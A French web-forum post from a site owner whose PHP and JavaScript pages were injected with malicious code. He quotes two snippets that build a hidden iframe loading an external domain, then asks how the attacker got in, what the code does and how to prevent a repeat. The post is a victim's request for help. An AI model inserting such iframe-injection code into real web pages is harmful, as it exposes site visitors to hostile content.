Bonsoir tout le monde.
Je viens d'avoir une mauvaise surprise lorsqu'une personne de mon entourage me fit savoir que mon site ne fonctionnait pas correctement et quand j'ai fais un petit tour j'ai vite remarqué que rien ne fonctionnait comme d'habitude.
A ma grande stupeur, j'ai remarqué qu'un petit malin s'était amusé à mettre du code dans mes pages. Voici ce qu'il a rajouté sur les pages en PHP
et aussi dans les fichiers JS
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5 #68c8c7# echo " <script type=\"text/javascript\" language=\"javascript\" > (function () { var id = '75'; var hpfu09 = document.createElement('iframe'); hpfu09.src = 'http://rekar.at/clk.php'; hpfu09.style.position = 'absolute'; hpfu09.style.border = '1'; hpfu09.style.height = '31px'; hpfu09.style.width = '42px'; hpfu09.style.left = '500px'; hpfu09.style.top = '100px'; if (!document.getElementById('hpfu')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\'hpfu\' style=\"position:absolute; width:80%; height:100%;\" ></div>'); document.getElementById('hpfu').appendChild(hpfu09); }})();</script>"; #/68c8c7#
Le problème c'est qu'il en a foutu pleins partout et j'ai plus de 100 pages sur mon site. Alors je suis en train de tout inspecter un par un.
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19 /*68c8c7*/ (function () { var id = '90'; var ny09 = document.createElement('iframe'); ny09.src = 'http://rekar.at/clk.php'; ny09.style.position = 'absolute'; ny09.style.border = '1'; ny09.style.height = '31px'; ny09.style.width = '42px'; ny09.style.left = '500px'; ny09.style.top = '100px'; if (!document.getElementById('ny')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\'ny\' style="position:absolute; width:80%; height:100%;" ></div>'); document.getElementById('ny').appendChild(ny09); } })(); /*/68c8c7*/
Mais j'ai plusieurs questions :
1 - Comment le gars a pu accéder à mes fichiers ?
2 - A quoi sert son code ?
3 - Comment éviter qu'il puisse recommencer ?
J'attends votre aide avec impatience car il y a des données sensibles qui circulent sur mon serveur.
Merci à vous
Partager